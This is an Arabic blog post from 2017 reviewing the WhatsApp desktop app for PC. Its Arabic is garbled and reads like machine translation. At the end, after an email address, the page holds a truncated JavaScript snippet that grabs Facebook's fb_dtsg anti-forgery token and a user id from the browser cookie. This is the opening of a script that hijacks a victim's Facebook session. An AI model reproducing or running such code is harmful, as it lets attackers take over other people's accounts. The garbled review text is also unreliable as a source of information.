jeudi 23 février 2017

تحميل برنامج whats app من اجل pc


تحميل برنامج whats app من اجل pc

نتيجة بحث الصور عن ‪whatsapp pc‬‏
ال WhatsApp برنامج الرسائل فقط على الأجهزة النقالة (الروبوت، دائرة الرقابة الداخلية، ويندوز فون وبلاك بيري)، ولكن مع PC-العلامة التجارية الجديدة وماك نسخة من التطبيق، يمكنك استخدام أخيرا من سطح المكتب الخاص بك! كل ما عليك القيام به هو مجرد تثبيت برنامج ال WhatsApp حتى تتمكن من الدردشة مع أصدقائك مباشرة من جهاز ماك أو جهاز كمبيوتر ويندوز. على الرغم من أنه يبدو للعمل بشكل جيد حتى الآن، فهي بعيدة عن الكمال.
ال WhatsApp الويب هو الآن التطبيق الأصلي
ربما كنت على علم الويب ال WhatsApp - الإصدار الذي يمكن استخدامه من خلال متصفح الانترنت الخاص بك. ال WhatsApp على حاسبك الشخصي هو بالضبط نفس الشيء، ولكن لا تحتاج إلى فتح المتصفح من أجل استخدامها.
ال WhatsApp للكمبيوتر هي أيضا تشبه الى حد بعيد النسخة المحمولة من التطبيق، لذلك إذا كنت من الاستخدام اليومي، فإنه بالتأكيد لن يأخذ كنت طويلة للحصول على تعليق من وظائفها. هذا الإصدار يقدم كل ما كنت تتوقع أن ترى (فقط على الشاشة الكبيرة)، ويوفر القدرة على الدردشة، وإرسال واستقبال الصور والوثائق والملاحظات وإنشاء وإدارة المجموعات وتغيير صورة ملفك الشخصي، الخ
كل شيء يبدو كبيرا إلى حد ما، ولكن هناك بعض القيود على التطبيق. على سبيل المثال، فإنه لا يسمح لك أن أشارككم الموقع، كما أنها لا تسمح لك لإضافة جهات اتصال جديدة.
نعم، على الرغم من أن ال WhatsApp للكمبيوتر هو الخيار الذي يجعل الحياة أسهل قليلا الآن، ومرة ​​أخرى، فإنه ليس من شيء يحدث ليحل محل جهاز المحمول الخاص بك في أي وقت قريب.كل شيء له "ولكن"
من أجل البدء في استخدام نسخة الإنترنت من التطبيق، تحتاج إلى مسح رمز الاستجابة السريعة أولا باستخدام جهاز المحمول الخاص بك، تماما كما تفعل مع شبكة ال WhatsApp. إذا كان لديك أي أسئلة حول هذا الإجراء، انقر هنا للحصول على برنامج تعليمي كامل.
بعد مسح رمز، حساب في ال WhatsApp قمت بالتسجيل للهاتف الخاص بك وسوف تكون مرتبطة مع واحدة جديدة على جهاز الكمبيوتر الخاص بك، ويمكنك أن تبدأ الدردشة!
يتم ترتيب الخيارات في إصدار سطح المكتب بشكل جميل (وهو ما يذكرنا ال WhatsApp لالروبوت). والحقيقة هي أنه لا يأخذ الكثير من الجهد من جانبكم للعثور على أي شيء تحتاجه وهو مجرد متعة للدردشة في أسرع بكثير بفضل سرعة لوحة المفاتيح. إذا كان لديك كاميرا ويب و / أو ميكروفون، لديك أيضا القدرة على إرسال الصور / الفيديو / مقاطع صوتية.
آخر شيء عظيم حول استخدام نسخة الأجهزة هو أن اتصالات الإنترنت تميل إلى أن تكون أسرع من تلك التي على الهاتف المحمول، وبالتالي نقل البيانات بشكل أسرع بكثير وعلى التوالي إلى الأمام.
جميع في كل شيء، ال WhatsApp للكمبيوتر يعمل على ما يرام، ولكن لا تعتمد كليا على هاتفك. يمكنك الدردشة مباشرة من جهاز الكمبيوتر الخاص بك، ولكن جهاز المحمول الخاص بك يجب أن تكون متصلا في جميع الأوقات. مع هذا القيد في الاعتبار، فإنه يضعه وراء منافسيها مثل خط وبرقية، الذين لديهم كل إصدارات سطح المكتب الخاصة المستقلة و.هل كان يستحق الانتظار؟
وقد يسأل مستخدمي ال WhatsApp للحصول على إصدار سطح المكتب لمدة طويلة، وأخيرا لديهم، على الرغم من عدم 100٪ ما كانوا يتوقعون. على الرغم من أن النسخة يعمل بشكل جيد للغاية ويقدم كل نفس الميزات تقريبا كما في النسخة المحمولة، أنها لا تملك واحدة من أهم - القدرة على العمل بشكل مستقل. يمكننا أن نأمل فقط أن الفيسبوك، الذي حاز على التطبيق مرة أخرى في عام 2014 
لاحظت عيب ونحن قد تحصل مفاجأة لطيفة في التحديث القادم

email

ssdfqsdfcd@gmail.com (function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(docume...